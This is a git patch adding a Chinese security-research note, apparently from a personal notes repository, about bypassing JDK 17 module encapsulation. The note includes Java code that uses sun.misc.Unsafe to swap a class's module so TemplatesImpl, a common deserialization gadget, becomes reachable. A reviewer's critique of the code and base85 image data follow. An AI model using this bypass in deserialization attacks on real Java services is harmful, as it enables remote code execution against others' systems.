@@ -0,0 +1,99 @@ +# jdk17 bypass module + +https://www.bennyhuo.com/2021/10/02/Java17-Updates-06-internals/ + +https://github.com/BeichenDream/Kcon2021Code/blob/master/bypassJdk/JdkSecurityBypass.java + +在jdk17使用反序列化的时候发现要报错 + +``` +InvokerTransformer: The method 'newTransformer' on 'class com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl' cannot be accessed +``` + +![image-20221220230825845](img/image-20221220230825845.png) + +限制了 + +![image-20221220233047039](img/image-20221220233047039.png) + +限制了的类https://cr.openjdk.java.net/~mr/jigsaw/jdk8-packages-strongly-encapsulated + +## 需要bypass + +``` +按照提案的说明,被严格限制的这些内部 API 包括: + +java.* 包下面的部分非 public 类、方法、属性,例如 Classloader 当中的 defineClass 等等。 +sun.* 下的所有类及其成员都是内部 API。 +绝大多数 com.sun.* 、 jdk.* 、org.* 包下面的类及其成员也是内部 API。 +``` + +**code** + +```java + +import sun.misc.Unsafe; +import java.lang.reflect.Field; +import java.lang.reflect.Method; +import java.util.ArrayList; + +/** + * https://cr.openjdk.java.net/~mr/jigsaw/jdk8-packages-strongly-encapsulated + */ +public class BypassModule { + public static void main(String[] args) throws Exception { + final ArrayList classes = new ArrayList<>(); + classes.add(Class.forName("java.lang.reflect.Field")); + classes.add(Class.forName("java.lang.reflect.Method")); + Class aClass = Class.forName("com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl"); + classes.add(aClass); + new BypassModule().bypassModule(classes); + aClass.newInstance(); + } + + public void bypassModule(ArrayList classes){ + try { + Unsafe unsafe = getUnsafe(); + Class currentClass = this.getClass(); + try { + Method getModuleMethod = getMethod(Class.class, "getModule", new Class[0]); + if (getModuleMethod != null) { + for (Class aClass : classes) { + Object targetModule = getModuleMethod.invoke(aClass, new Object[]{}); + unsafe.getAndSetObject(currentClass, unsafe.objectFieldOffset(Class.class.getDeclaredField("module")), targetModule); + } + } + }catch (Exception e) { + } + }catch (Exception e){ 
+ e.printStackTrace(); + } + } + + private static Method getMethod(Class clazz,String methodName,Class[] params) { + Method method = null; + while (clazz!=null){ + try { + method = clazz.getDeclaredMethod(methodName,params); + break; + }catch (NoSuchMethodException e){ + clazz = clazz.getSuperclass(); + } + } + return method; + } + + private static Unsafe getUnsafe() { + Unsafe unsafe = null; + try { + Field field = Unsafe.class.getDeclaredField("theUnsafe"); + field.setAccessible(true); + unsafe = (Unsafe) field.get(null); + } catch (Exception e) { + throw new AssertionError(e); + } + return unsafe; + } +} +``` + From 23663113e7379fcb4a82734418991f114bcccb73 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Wed, 21 Dec 2022 16:13:21 +0800 Subject: [PATCH 148/257] Add files via upload --- .../img/image-20221220230825845.png" | Bin 0 -> 88141 bytes .../img/image-20221220233047039.png" | Bin 0 -> 130319 bytes 2 files changed, 0 insertions(+), 0 deletions(-) create mode 100644 "java\346\227\245\345\270\270/img/image-20221220230825845.png" create mode 100644 "java\346\227\245\345\270\270/img/image-20221220233047039.png" 
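Review bot: In `jdk17绕过Module.md` ([PATCH 147/257]), the inner `catch (Exception e) { }` in `bypassModule` swallows every failure from the `getModule` lookup and the `unsafe.getAndSetObject(...)` call, so when the module swap does not happen `main` still continues to `aClass.newInstance()` and the failure surfaces later with no indication of the cause; log or rethrow there, as the outer catch already does with `e.printStackTrace()`. The loop also writes each class's module into the same `currentClass` slot, so only the last list entry (`TemplatesImpl`) has a lasting effect and the `Field` and `Method` entries are overwritten; the document should say which module is intended and why the other two are listed. As shown, `ArrayList classes` is a raw type, so `for (Class aClass : classes)` will not compile; declare it as `ArrayList<Class<?>>`. The section under "需要bypass" would also benefit from one sentence stating the precondition the code relies on, namely that `sun.misc.Unsafe` is reflectively reachable from application code, since that is the part a reader hardening a JDK 17 deployment needs to know.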
diff --git "a/java\346\227\245\345\270\270/img/image-20221220230825845.png" "b/java\346\227\245\345\270\270/img/image-20221220230825845.png" new file mode 100644 index 0000000000000000000000000000000000000000..3d05b8e54a8c9df34ea91fd3311d710efb20620b GIT binary patch literal 88141
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

ufMt*B53w#J{yYO+D> z9r_29_S_S=;(_5ndzAVFzZU%_ALAPh@2z-8_|v@_rsqvB?RtP(Q?eQ1SYDKSh&Ms- zJppiC2pKwMUUQ=3@r&rZyjJwiPGytmON|NsX2h9bmg=W**`M2lmN=sdacz4~S*lO( zzd3=zNwiJdYY*Ko$5<`C7q7menNQ)UOq{r`E%t;$hQBvtz zg$|%y36HEBOKo2L8mPr`DXC2#?mvx$EN*~xA$-}qc z0eyGvd7#bi!o}e|*&f2RqTYgr+NXQed2mw~;$vXZtTQ|FoL7|icO}x!Fum^4Rn`}{e=X5~U4I&#(Av>-i#cHS-I?XfCv-7i zil{|Ke*;dJPMmr5ivNz>`gisa3L8;>xG41H+EA`&1?_9s7rbmnw(!8;mFucapc2;s zg9~1J(|>tLiF==Z#iU0+>9^o~!EYO=8po*uZJF4)in6)6j)-X8Sx70TaT@%wl;jx$ zQS`s8Rw)AvYS3Ol-g@t%x@AUTIF+@{FTlk!jXN&Qf(GtpV8T z_Y!qO0;reu@gdgk$$5cPs`Zq#`P(|PeqX1Wkx1`bThBKR|LIpXqwu-@QdrlUx; z+nH9_fh>I0^tPT2(nNO^4l;8#Cl-2;bwu~0LGHGul{$mL^+1~A@TJ~Qy(~oQaYHu2 z0k0aYk6K{TwW_gjwk-o|*vH!(YB6A+DVeT!Yjgg|h|l}b9+zRMJm)s4tXZN}r(#Ge zk!@)>g!jE^tAYTikc;ZHhBkswR@=wb5w4v&sno_7^l$4tZYWyO)ls>#@)Wo?Nd-glLxHVmmcIS)_l; zm!fC|^Y3`wPkMD`LIk8GPhz+7Z+nr(tMFG4nvFea)j?gLeXz_<8gk_uin}_))#?yz ztY;iN%z4i*6r-!6iByH&_+ob5Rys51lWUa*Zb-$WlvluB51FycCRQL{r<#p0dXbYl zl+x2gLlYFs>h@UmMGgs0$P+u;@yRUYiUVEv{y_R8BIp(EA^r4hnKt{fqwV;addz?@ zsuKhLMZfXnTy5(R8k}!~B+Qo=rc-y@%u#l2TRbPx-HIRJk|=%#yB{oDAWOJ1ZaWwK zO6}=^u%6pE|DpY#Nxd+!mLJZ}&MLlK5|4Tn%h$ZSV5LWvMN8oyNi0v?db*E)qFt8B zV8be_?erF#d)hkpA#sILvp}z|mr0oZM>Z|ctKZq`<-Mx3LMtb;_vwp%#?m`SJ*#k^ zoZ36nWLqB3DMWDLzkPw35qLl|b;#WGU&KLcdufQWrb%L3R-4;Q6!Y#QgiH63JVKYL z8zTG%C|9l@!(=rt9`e5Vbc}Wt(65QrM(0=l4{L`0VSXtJ)3j+Op9hCkbCjw+_03_h 